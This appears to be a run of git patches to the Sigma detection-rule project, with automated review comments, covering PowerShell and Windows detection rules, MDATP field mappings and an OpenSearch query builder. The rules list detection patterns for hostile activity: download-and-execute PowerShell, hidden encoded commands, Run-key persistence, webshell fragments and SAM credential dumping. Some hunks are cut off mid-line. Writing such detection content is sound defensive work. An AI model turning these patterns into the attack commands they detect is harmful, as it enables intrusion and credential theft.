diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 4677ef36..73626bb1 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml @@ -18,15 +18,12 @@ logsource: product: windows service: powershell detection: - downloadfile: - Message|contains|all: - - 'System.Net.WebClient' - - '.DownloadFile(' - downloadstring: - Message|contains|all: - - 'System.Net.WebClient' - - '.DownloadString(' - condition: downloadfile or downloadstring + webclient: + - 'System.Net.WebClient' + download: + - '.DownloadFile(' + - '.DownloadString(' + condition: webclient and download --- logsource: product: windows diff --git a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml index 97833fc3..39da524b 100644 --- a/rules/windows/powershell/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/powershell/powershell_suspicious_invocation_specific.yml 
@@ -13,50 +13,44 @@ logsource: service: powershell detection: convert_b64: - Message|contains|all: - - '-nop' - - ' -w ' - - 'hidden' - - ' -c ' - - '[Convert]::FromBase64String' + - '-nop' + - ' -w ' + - 'hidden' + - ' -c ' + - '[Convert]::FromBase64String' iex_selection: - Message|contains|all: - - ' -w ' - - 'hidden' - - '-noni' - - '-nop' - - ' -c ' - - 'iex' - - 'New-Object' + - ' -w ' + - 'hidden' + - '-noni' + - '-nop' + - ' -c ' + - 'iex' + - 'New-Object' enc_selection: - Message|contains|all: - - ' -w ' - - 'hidden' - - '-ep' - - 'bypass' - - '-Enc' + - ' -w ' + - 'hidden' + - '-ep' + - 'bypass' + - '-Enc' reg_selection: - Message|contains|all: - - 'powershell' - - 'reg' - - 'add' - - 'HKCU\software\microsoft\windows\currentversion\run' + - 'powershell' + - 'reg' + - 'add' + - 'HKCU\software\microsoft\windows\currentversion\run' webclient_selection: - Message|contains|all: - - 'bypass' - - '-noprofile' - - '-windowstyle' - - 'hidden' - - 'new-object' - - 'system.net.webclient' - - '.download' + - 'bypass' + - '-noprofile' + - '-windowstyle' + - 'hidden' + - 'new-object' + - 'system.net.webclient' + - '.download' iex_webclient: - Message|contains|all: - - 'iex' - - 'New-Object' - - 'Net.WebClient' - - '.Download' - condition: 1 of them + - 'iex' + - 'New-Object' + - 'Net.WebClient' + - '.Download' + condition: all of convert_b64 or all of iex_selection or all of enc_selection or all of reg_selection or all of webclient_selection or all of iex_webclient falsepositives: - Penetration tests level: high diff --git a/rules/windows/powershell/powershell_suspicious_keywords.yml b/rules/windows/powershell/powershell_suspicious_keywords.yml index c363bf38..fee321a2 100644 --- a/rules/windows/powershell/powershell_suspicious_keywords.yml +++ b/rules/windows/powershell/powershell_suspicious_keywords.yml 
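Review bot: Several entries in `convert_b64`, `iex_selection` and `enc_selection` rely on surrounding spaces (`' -w '`, `' -c '`) to separate the short switch from longer ones such as `-command` or `-windowstyle`; with `Message|contains` these were literal substring matches, but a bare keyword list is handed to the backend as a full-text query, and on an analyzed field the padding whitespace and the leading `-` are discarded at tokenization, so what is actually matched becomes backend-dependent. Either keep these in a field-bound selection with `|contains|all` on whichever message field the target log source exposes, or add a comment to the rule stating that the keyword form assumes literal (unanalyzed) matching. The new `condition: all of convert_b64 or all of iex_selection or ...` also depends on the compiler treating `all of <list-identifier>` as a conjunction of the list items; I believe sigmac does, but a short comment above the condition (`# each list is AND-ed via 'all of'`) would make the intent explicit to readers used to OR-ed keyword lists.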
@@ -20,18 +20,17 @@ logsource: definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277. Monitor for EventID 4104' detection: keywords: - Message|contains: - - "System.Reflection.Assembly.Load" - - "[System.Reflection.Assembly]::Load" - - "[Reflection.Assembly]::Load" - - "System.Reflection.AssemblyName" - - "Reflection.Emit.AssemblyBuilderAccess" - - "Runtime.InteropServices.DllImportAttribute" - - "SuspendThread" - - "rundll32" - - "FromBase64" - - "Invoke-WMIMethod" - - "http://127.0.0.1" + - "System.Reflection.Assembly.Load" + - "[System.Reflection.Assembly]::Load" + - "[Reflection.Assembly]::Load" + - "System.Reflection.AssemblyName" + - "Reflection.Emit.AssemblyBuilderAccess" + - "Runtime.InteropServices.DllImportAttribute" + - "SuspendThread" + - "rundll32" + - "FromBase64" + - "Invoke-WMIMethod" + - "http://127.0.0.1" condition: keywords falsepositives: - Penetration tests diff --git a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml index b6595428..7b26a54e 100644 --- a/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml +++ b/rules/windows/powershell/powershell_wsman_com_provider_no_powershell.yml @@ -19,9 +19,9 @@ logsource: service: powershell detection: selection: - Message|contains: 'ProviderName=WSMan' + - 'ProviderName=WSMan' filter: - Message|contains: 'HostApplication=*powershell' + - 'HostApplication=*powershell' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml index 8dd5846d..64adeae7 100644 --- a/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml +++ b/rules/windows/process_creation/win_exchange_proxylogon_oabvirtualdir.yml 
@@ -11,16 +11,14 @@ logsource: service: msexchange-management detection: selection_cmdlet: - Message|contains|all: - - 'OabVirtualDirectory' - - ' -ExternalUrl ' + - 'OabVirtualDirectory' + - ' -ExternalUrl ' selection_params: - Message|contains: - - 'eval(request' - - 'http://f/ Date: Thu, 12 Aug 2021 18:06:10 +0100 Subject: [PATCH 0317/1367] Enabling Linux/macOS support on MDATP, fixing incorrect parent cmd mappings --- tools/sigma/backends/mdatp.py | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index eb535835..1d45b747 100644 --- a/tools/sigma/backends/mdatp.py +++ b/tools/sigma/backends/mdatp.py @@ -118,7 +118,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ObjectValueName": ("RegistryValueName", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), @@ -132,7 +131,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "OriginUrl": ("FileOriginUrl", self.default_value_mapping), "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "ParentName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), 
@@ -149,7 +147,6 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "Initiated": ("RemotePort", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "Protocol": ("RemoteProtocol", self.default_value_mapping), "SourceIp": ("LocalIP", self.default_value_mapping), @@ -162,7 +159,7 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): "FileName": (self.id_mapping, self.default_value_mapping), "Image": ("InitiatingProcessFolderPath", self.default_value_mapping), "ImageLoaded": ("FolderPath", self.default_value_mapping), - "ParentCommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), + "CommandLine": ("InitiatingProcessCommandLine", self.default_value_mapping), "ParentProcessName": ("InitiatingProcessParentFileName", self.default_value_mapping), "ProcessName": ("InitiatingProcessFileName", self.default_value_mapping), "TargetImage": ("FolderPath", self.default_value_mapping), 
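Review bot: With `ParentCommandLine` removed from the registry, file and network tables (this hunk and the previous one) and replaced by `CommandLine` in the image-load table, a rule that uses `ParentCommandLine` on those log sources now has no mapping at all; whether that surfaces as an explicit NotSupportedError or as a raw `ParentCommandLine` column silently emitted into KQL depends on the field lookup outside this hunk, so please confirm it is the former, because a raw column name would make the query fail or match nothing. The replacement itself looks right: in these tables the `InitiatingProcess*` columns describe the process performing the action, so `InitiatingProcessCommandLine` is that process's own command line and the old mapping was semantically wrong, and the parent is only exposed by file name (`InitiatingProcessParentFileName`, as the neighbouring mapping shows), which I take to be why the entry was dropped rather than redirected. A comment on the mapping dict would keep this from being reintroduced: `# InitiatingProcess* = the acting process itself; only its parent's file name is available, so ParentCommandLine is deliberately unmapped`. The enclosing fieldMappings dict starts and ends outside the hunk.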
@@ -258,19 +255,19 @@ class WindowsDefenderATPBackend(SingleTextQueryBackend): self.product = None self.service = None - if (self.category, self.product, self.service) == ("process_creation", "windows", None): + if (self.category, self.service) == ("process_creation", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceProcessEvents") self.current_table = "DeviceProcessEvents" elif (self.category, self.product, self.service) == ("registry_event", "windows", None): self.tables.append("DeviceRegistryEvents") self.current_table = "DeviceRegistryEvents" - elif (self.category, self.product, self.service) == ("file_event", "windows", None): + elif (self.category, self.service) == ("file_event", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceFileEvents") self.current_table = "DeviceFileEvents" elif (self.category, self.product, self.service) == ("image_load", "windows", None): self.tables.append("DeviceImageLoadEvents") self.current_table = "DeviceImageLoadEvents" - elif (self.category, self.product, self.service) == ("network_connection", "windows", None): + elif (self.category, self.service) == ("network_connection", None) and self.product in ['windows', 'linux', 'macos']: self.tables.append("DeviceNetworkEvents") self.current_table = "DeviceNetworkEvents" elif (self.category, self.product, self.service) == (None, "windows", "powershell"): From 3f37ee3964761c4feb714ffaf7824658e5fd681c Mon Sep 17 00:00:00 2001 From: Young Date: Thu, 12 Aug 2021 22:40:45 -0700 Subject: [PATCH 0318/1367] created build query method --- .DS_Store | Bin 0 -> 8196 bytes tools/.DS_Store | Bin 0 -> 6148 bytes tools/osMonitor.json | 1 + tools/sigma/backends/opensearch.py | 69 ++++++++++++++++++++++++++--- 4 files changed, 64 insertions(+), 6 deletions(-) create mode 100644 .DS_Store create mode 100644 tools/.DS_Store create mode 100644 tools/osMonitor.json 
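Review bot: The supported-product list `['windows', 'linux', 'macos']` is now repeated verbatim in three `elif` arms; hoist it to a class-level constant, e.g. `SUPPORTED_PRODUCTS = ('windows', 'linux', 'macos')`, and test `self.product in self.SUPPORTED_PRODUCTS`, so the next table or product spelling (`macos` vs `mac`) is changed in one place. `registry_event` and `image_load` deliberately stay Windows-only, which as far as I know matches the platforms those two tables are populated for; a one-line comment on those arms (`# registry and image-load tables only carry Windows data`) would stop someone from "completing" the change later. The method containing this dispatch starts before the hunk.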
diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..8ec7eb62074302687bee5f8d1e0690ea3c2ceae7 GIT binary patch literal 8196 zcmeHM(QXn!6um=B3u(1A)!3Mr?2B(Lp=gYKFhL4YVy%rd`kLt3;GSVZXe9YJ%}~ zE@PI^XRg2t@QGfLLx+^16Kam3%?YD`QNSo*6fg=H1=faF-(=d~XyFR6&BRu4i`gJi9pS;NW-7UL*&31ho2%c2; zP%=NIp+&Sp1$sgyoPS7V+M)Z1vPBPY%})is6U8PDW7uo74K=oK|2t5igwYhi z3Q%gO9jS5#x^>CrXp`<$D*Yv-bc!CK_haCBe+9hg7>G3uUfQ|Bs=v6ATORdUfu5%{H|B;$T$^sAgj5n3G=lUK$GG@%vF63-Y z7FDK9SgOS+8V}Be%r!cWNzBO;=B4!{DdHh=I*d&TnL=Sk5=p7kBO03%LtG3c#-%?< zS_j8NLUnOREsU%!lWxNFi$qufgSYHBz1PvM$+Y343?jTm&0Be~R{^I{BuY~D)j=Jb z9<1UR(#PoBF(h=GhWvL^Gk_FQj96+Shm08oPFaB&6@Qi2|E1~s|ED|(6W%Cb6!@D8 zh}mMLSilH=|Bi|ehS%B_$^i-+lQ%#gK$lIh)1!OBWL#RyHe8R8jm|N{^k}{; zFXqdOR&?q}3M2*oH3j6|-9m{au5pF%{gtt|Z23<$U3woMaD;al;us_PocD(~rO#30 z8*1Bp#~TIM>BSU)1x4z;P6PZXN5#wBOS@r8Zt3Aw7)y{Fbo);47CfPB%a zRhjA&GAgdF#u_WemwYDv7nO>t7CxiPl{_+5xDD52LsX`Ucg&WwF;|{BUJ>PzQ?i8MtF1PyHVAnsy3!kResJf)mxJl{fgx21Ua|7 zoMp5=susjks~x?sYFXP?ucP5o&A}MD;zc!Egi-kK8(w3+zG{KcFvz^ zI80$N`J_NnAXMOmz3t2XKm7gqKP08Qq(D;OSt(#TgVErCCAqz|Rh;a#8QW(zF^Ov| lDuvE%$9f@K@h+Ph$1=Gf77iPW?4hMU0xCmtNrAtrzyplY?Xv&? literal 0 HcmV?d00001 diff --git a/tools/osMonitor.json b/tools/osMonitor.json new file mode 100644 index 00000000..84104dd6 --- /dev/null +++ b/tools/osMonitor.json 
@@ -0,0 +1 @@ +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index d202e58a..0f6ae3b0 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py 
@@ -156,16 +156,73 @@ class OpenSearchBackend(object): ''' Builds OpenSearch monitor query from translated Elastic Common Schema query. - Only supports must and must_not clauses. + Only supports must and should clauses. ''' def build_query(self, translation): - return { + translation = "(winlog.channel:\"System\" OR winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # translation = "(winlog.channel:\"System\"" + parsedTranslation = translation.strip("()").split() + + if len(parsedTranslation) == 0: + return {} + + boolMappings = {"and": "must", "or": "should"} + clauses = [] + currMatches = [] + + if len(parsedTranslation) == 1 or (parsedTranslation[1].lower() == "or" and len(parsedTranslation) > 3 and parsedTranslation[3].lower() == "and"): + defaultClause = "must" + else: + defaultClause = boolMappings[parsedTranslation[1].lower()] + + currQuery = { + "bool": { + defaultClause : currMatches + } + } + prevOp = "and" if defaultClause == "must" else "or" + + for index in range(0, len(parsedTranslation)-1, 2): + element = parsedTranslation[index] + nextElement = parsedTranslation[index+1].lower() + + currMatches.append({ + "match": { + element.split(":")[0]: element.split(":")[1] + } + }) + + if nextElement != prevOp: + clauses.append(currQuery) + currMatches = [] + + if nextElement == "or" and index+3 < len(parsedTranslation) and parsedTranslation[index+3].lower() == "or": + nextClause = "should" + else: + nextClause = "must" + + currQuery = { "bool": { - "must": { - "match_all": translation - } + nextClause : currMatches } } + + prevOp = nextElement + + currMatches.append({ + "match": { + parsedTranslation[-1].split(":")[0]: parsedTranslation[-1].split(":")[1] + } + }) + clauses.append(currQuery) + + if len(clauses) > 1: + return { + "bool": { + "should": clauses + } + } + return clauses[0] ''' Builds inputs field of OS monitor. 
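Review bot: `build_query` unconditionally reassigns its `translation` parameter to a hard-coded QuarksPwDump query on its first line, so every monitor produced by this backend carries the same query regardless of the rule; the committed `tools/osMonitor.json` on the preceding lines shows exactly that mismatch (name "RDP over Reverse SSH Tunnel WFP", query on HiveName/SAM). Delete that assignment and the commented variant under it before this ships, and add a short docstring line such as `translation: Lucene query-string produced by the Elasticsearch backend; parsed here into bool/match clauses`. `element.split(":")[1]` also keeps only the text between the first and second colon, so values such as `http://...` or `C:\\...` are truncated; `field, _, value = element.partition(":")` keeps the whole value. Separately, the same commit adds two `.DS_Store` binaries and a generated `osMonitor.json` under `tools/`; those should be dropped and `.DS_Store` added to `.gitignore`.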
@@ -174,7 +231,7 @@ class OpenSearchBackend(object): return [ { "search": { - "index": MONITOR_INDICES, + "indices": MONITOR_INDICES, "query": { "size": NUM_RESULTS, "aggregations": {}, From 900d149512d54336ead0dfaf4fb63c7333d76ca1 Mon Sep 17 00:00:00 2001 From: Young Date: Fri, 13 Aug 2021 00:42:26 -0700 Subject: [PATCH 0319/1367] finished functionality for building flat queries --- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 85 +++++++++++++++--------------- 2 files changed, 43 insertions(+), 44 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 84104dd6..80a0c98d 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json 
@@ -1 +1 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}]}}, {"bool": {"must": [{"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} +{"type": "monitor", "name": "QuarksPwDump Clearing Access History", "description": "Detects QuarksPwDump clearing access history in hive", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": 
"\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {" winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM* "}}, {"match": {" winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Credential Access", "T1003", "T1003.002"], "triggers": [{"name": "generated-trigger", "severity": "1", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "threat": [{"tactic": {"id": "TA0006", "reference": "https://attack.mitre.org/tactics/TA0006", "name": "Credential Access"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1003", "name": "OS Credential Dumping", "reference": "https://attack.mitre.org/techniques/T1003"}]}]}} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 0f6ae3b0..f26b75b2 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py 
@@ -159,63 +159,62 @@ class OpenSearchBackend(object): Only supports must and should clauses. ''' def build_query(self, translation): - translation = "(winlog.channel:\"System\" OR winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" # translation = "(winlog.channel:\"System\"" - parsedTranslation = translation.strip("()").split() + parsedTranslation = translation.strip("()").split("OR") if len(parsedTranslation) == 0: return {} - - boolMappings = {"and": "must", "or": "should"} + clauses = [] - currMatches = [] - - if len(parsedTranslation) == 1 or (parsedTranslation[1].lower() == "or" and len(parsedTranslation) > 3 and parsedTranslation[3].lower() == "and"): - defaultClause = "must" - else: - defaultClause = boolMappings[parsedTranslation[1].lower()] - - currQuery = { - "bool": { - defaultClause : currMatches - } - } - prevOp = "and" if defaultClause == "must" else "or" - for index in range(0, len(parsedTranslation)-1, 2): - element = parsedTranslation[index] - nextElement = parsedTranslation[index+1].lower() + translateIndex = 0 + while translateIndex < len(parsedTranslation): + expression = parsedTranslation[translateIndex] + currMatches = [] + clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements - currMatches.append({ - "match": { - element.split(":")[0]: element.split(":")[1] - } - }) + parsedExpression = expression.split() - if nextElement != prevOp: - clauses.append(currQuery) - currMatches = [] + # Statement was joined by "or" + if len(parsedExpression) == 1: + counter = 1 + tempIndex = translateIndex + while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1].split()) == 1: + tempIndex += 1 + counter += 1 - if 
nextElement == "or" and index+3 < len(parsedTranslation) and parsedTranslation[index+3].lower() == "or": - nextClause = "should" - else: - nextClause = "must" + # If there's more than one, use "should" clase instead of "must" + if counter > 1: + clause = "should" + parsedExpression = [] - currQuery = { - "bool": { - nextClause : currMatches + # Rebuild parsed expression to join statements together and fast forward the translate index + for i in range(counter): + parsedExpression.append(parsedTranslation[translateIndex+i]) + parsedExpression.append(None) + + translateIndex = tempIndex + + # Iterate through each statement and join match statements into array + for expressionIndex in range(0, len(parsedExpression), 2): + element = parsedExpression[expressionIndex] + currMatches.append({ + "match": { + element.split(":")[0]: element.split(":")[1] } + }) + + currQuery = { + "bool": { + clause: currMatches } - - prevOp = nextElement - - currMatches.append({ - "match": { - parsedTranslation[-1].split(":")[0]: parsedTranslation[-1].split(":")[1] } - }) - clauses.append(currQuery) + clauses.append(currQuery) + translateIndex += 1 + + # If only one type of clause, don't use nested bool object if len(clauses) > 1: return { "bool": { From e1ef8f40559a7c54f94aa1065893fdfa79fd61fa Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Fri, 13 Aug 2021 10:28:34 +0200 Subject: [PATCH 0320/1367] fix: Rewrite another message rule Rewrites another message rule. This one is a bit more complex since a bitmap is used and the string representation is not available. --- .../win_alert_enable_weak_encryption.yml | 70 ++++++++++++++++--- 1 file changed, 61 insertions(+), 9 deletions(-) diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml index c0904ce5..90af9166 100644 --- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml +++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml 
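Review bot: The debug override `translation = "(winlog.channel:..."` is still the first statement of `build_query` after this rewrite, so the parameter remains ignored and every monitor gets the same query; it has to go. The new splitter `translation.strip("()").split("OR")` is a plain substring split, so any value containing the uppercase letters `OR` (a hostname, `NETWORK`, `ERROR`) is torn apart, and because the separator is not padded the fragments keep their whitespace — the regenerated `osMonitor.json` above shows the field name `" winlog.event_data.HiveName.keyword"` with a leading space and a value ending in a space; split on `" OR "` and `.strip()` each part, or better, consume a structured (DSL) translation instead of re-parsing the query string. Every leaf is also emitted as a `match` clause, which treats the `*` in `*.dmp` and the embedded quotes in `"System"` literally; wildcard values need a `wildcard` query on the keyword field and quoted phrases need the quotes stripped or a `match_phrase`. The `parsedExpression.append(None)` placeholders combined with `range(0, len(parsedExpression), 2)` are the kind of trick that deserves a comment (`# every odd slot is a separator placeholder so the step-2 walk lands on terms`).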
@@ -17,15 +17,67 @@ logsource: detection: selection: EventID: 4738 - keywords: - Message|contains: - - 'DES' - - 'Preauth' - - 'Encrypted' - filters: - Message|contains: - - 'Enabled' - condition: selection and keywords and filters + olduac_des: # 0x8000 + OldUacValue|endswith: + - 8??? + - 9??? + - A??? + - B??? + - C??? + - D??? + - E??? + - F??? + newuac_des: + NewUacValue|endswith: + - 8??? + - 9??? + - A??? + - B??? + - C??? + - D??? + - E??? + - F??? + olduac_preauth: # 0x10000 + OldUacValue|endswith: + - 1???? + - 3???? + - 5???? + - 7???? + - 9???? + - B???? + - D???? + - F???? + newuac_preauth: + NewUacValue|endswith: + - 1???? + - 3???? + - 5???? + - 7???? + - 9???? + - B???? + - D???? + - F???? + olduac_encrypted: # 0x800 + OldUacValue|endswith: + - 8?? + - 9?? + - A?? + - B?? + - C?? + - D?? + - E?? + - F?? + newuac_encrypted: + NewUacValue|endswith: + - 8?? + - 9?? + - A?? + - B?? + - C?? + - D?? + - E?? + - F?? + condition: selection and ((newuac_des and not olduac_des) or (newuac_preauth and not olduac_preauth) or (newuac_encrypted and not olduac_encrypted)) falsepositives: - Unknown level: high From 5e42187062a92d0ff9012ecbeac77288f89e2ea4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 13 Aug 2021 11:01:33 +0200 Subject: [PATCH 0321/1367] remove change for Message rule --- .../builtin/win_alert_active_directory_user_control.yml | 8 +++++--- .../windows/builtin/win_alert_enable_weak_encryption.yml | 4 ++-- rules/windows/builtin/win_vul_cve_2020_0688.yml | 5 +++-- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_alert_active_directory_user_control.yml b/rules/windows/builtin/win_alert_active_directory_user_control.yml index 8825ab11..078f02eb 100644 --- a/rules/windows/builtin/win_alert_active_directory_user_control.yml +++ b/rules/windows/builtin/win_alert_active_directory_user_control.yml 
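Review bot: The nibble patterns are correct only for the flag encoding that event 4738 prints in OldUacValue/NewUacValue (0x800 encrypted-text password, 0x8000 DES-only keys, 0x10000 pre-auth not required, per the hunk's own comments), which differs from the LDAP userAccountControl bits where, as far as I recall, the same flags sit at 0x80, 0x200000 and 0x400000; without saying so in the rule, a future maintainer is likely to "correct" the masks. Suggest widening the three inline comments, e.g. `# 0x8000 USER_USE_DES_KEY_ONLY in the 4738 UAC-value encoding (not LDAP userAccountControl): 4th hex digit from the right has its high bit set -> 8..F`. It is also worth one comment that `?` is a single-character wildcard and the value carries the `0x` prefix, so a value shorter than the pattern (e.g. `0x15`) simply fails to match, which is the intended "flag not set" result. The list form duplicating eight entries six times is unavoidable in Sigma, but the comments above make it reviewable.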
@@ -8,7 +8,7 @@ references:
 - https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
 author: '@neu5ron'
 date: 2017/07/30
-modified: 2021/08/09
+modified: 2020/08/23
 logsource:
 product: windows
 service: security
@@ -16,8 +16,10 @@ logsource:
 detection:
 selection:
 EventID: 4704
- Message|contains: 'SeEnableDelegationPrivilege'
- condition: selection
+ keywords:
+ Message|contains:
+ - 'SeEnableDelegationPrivilege'
+ condition: all of them
 falsepositives:
 - Unknown
 level: high
diff --git a/rules/windows/builtin/win_alert_enable_weak_encryption.yml b/rules/windows/builtin/win_alert_enable_weak_encryption.yml
index abc236e0..c0904ce5 100644
--- a/rules/windows/builtin/win_alert_enable_weak_encryption.yml
+++ b/rules/windows/builtin/win_alert_enable_weak_encryption.yml
@@ -6,7 +6,6 @@ references:
 - https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
 author: '@neu5ron'
 date: 2017/07/30
-modified: 2021/08/09
 tags:
 - attack.defense_evasion
 - attack.t1089 # an old one
@@ -24,7 +23,8 @@ detection:
 - 'Preauth'
 - 'Encrypted'
 filters:
- Message|contains: 'Enabled'
+ Message|contains:
+ - 'Enabled'
 condition: selection and keywords and filters
 falsepositives:
 - Unknown
diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml
index b34e251e..51a0902c 100644
--- a/rules/windows/builtin/win_vul_cve_2020_0688.yml
+++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml
@@ -7,7 +7,7 @@ references:
